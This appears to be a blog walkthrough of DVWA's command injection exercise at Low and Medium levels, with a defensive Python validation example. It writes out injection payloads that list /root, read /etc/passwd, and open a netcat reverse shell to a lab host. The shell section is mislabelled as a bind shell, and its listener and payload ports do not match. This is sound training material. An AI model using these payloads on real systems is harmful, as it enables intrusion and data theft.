DVWA: Damn Vulnerable Web Application Command Execution solutions (Low & Medium)

Command Execution or Command injection is an attack in which the goal is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.


"Disclaimer: The information provided in this article is intended for educational and research purposes only. It is not intended to promote or encourage any illegal or unethical activities. Always act responsibly and obtain proper consent before using any tools or techniques described in this article."

  • Low

DVWA Security > Script Security > Low > Submit

If we check the source code for Low:


From the source code above you can see that a random integer, or any other characters, can be entered instead of an IP address: the application does not validate user input, so anything can be submitted. Any shell operator (meta-character) can then be used to trick the shell into executing arbitrary commands.

The code does not check that $target actually matches an IP address, and there is no filtering of special characters.

In Unix/Linux, ; separates commands on a single line.


10.0.2.5; ls -la /root - list all the files in the root directory


After the shell executes 10.0.2.5; it goes on to execute ls -la /root, because the ; ends the first command and everything after it is treated as a new command.

Alternatives to ;

  1. && - AND operator (the second command runs if the first one succeeds)
  2. | - pipe operator (the output of the first command is fed to the second)

  • Medium

DVWA Security > Script Security > Medium > Submit

Viewing the source code:


we see that a blacklist has been set to remove && and ; from the input.

As noted above, we can use | as a replacement:

10.0.2.5| cat /etc/passwd. The double || can also be used.
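To make the Low and Medium points concrete from the defender's side, here is an added example (my own code, not DVWA's source) that models the Medium-style blacklist described above, shows why it still lets | and || through, and contrasts it with an allowlist check that only accepts a syntactically valid IP address and never hands the value to a shell at all. The sample inputs are constructed from the payloads in this post; the function names and the exact blacklist are assumptions.

```python
import ipaddress
import re
from typing import List, Optional

# Constructed sample inputs: the payloads from this post plus a benign address.
SAMPLE_INPUTS = [
    "10.0.2.5",
    "10.0.2.5; ls -la /root",
    "10.0.2.5&& ls -la /root",
    "10.0.2.5| cat /etc/passwd",
    "10.0.2.5|| cat /etc/passwd",
]

# Shell characters that let a single argument turn into several commands.
SHELL_META = re.compile(r"[;&|`$<>\n(){}]")


def medium_blacklist(target: str) -> str:
    """Model of the Medium level idea: strip '&&' and ';' and pass the rest on.
    (Assumption: modelled on the post's description, not DVWA's exact code.)"""
    for bad in ("&&", ";"):
        target = target.replace(bad, "")
    return target


def blacklist_leaves_metachars(target: str) -> bool:
    """True when shell metacharacters survive the blacklist, i.e. the filter
    can be bypassed (as the post shows with | and ||)."""
    return SHELL_META.search(medium_blacklist(target)) is not None


def validate_ip(target: str) -> Optional[str]:
    """Allowlist: accept the value only if it parses as an IPv4/IPv6 address.
    Anything with a trailing command is rejected outright."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        return None


def build_ping_argv(target: str) -> Optional[List[str]]:
    """Build the ping command as an argument list. Because this is meant for
    subprocess.run(argv) without shell=True, no shell ever sees the value,
    so metacharacters cannot be interpreted even if validation were weaker."""
    ip = validate_ip(target)
    if ip is None:
        return None
    return ["ping", "-c", "4", ip]


if __name__ == "__main__":
    for value in SAMPLE_INPUTS:
        print(f"{value!r:32} blacklist-bypass={blacklist_leaves_metachars(value)!s:5} "
              f"allowlist={build_ping_argv(value)}")
```

Run as a script, the table shows that only the plain address passes the allowlist, while the blacklist still lets the | and || payloads reach the shell. The two defences stack: validate against what the field is supposed to contain, and execute without a shell so the remaining characters have no special meaning.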



 

Bind Shell

Run nc -lvp 12346 in your own Linux terminal. This creates a netcat listener.



Now run 10.0.2.5;nc.traditional -e /bin/bash 10.0.2.4 12345 in the DVWA command injection field and click Submit.

Now you have a reverse connection established with the server.

Points to note:

  1. Make sure you use commands specific to the target you are attacking: all of the above are Linux commands, and Windows commands will be different.
  2. Try commands with and without a space between them.
  3. You will not always have access to the source code.

The walkthrough for high security will follow soon.

If you got stuck or have any questions, leave a comment, and I’ll do my best to get back to you.
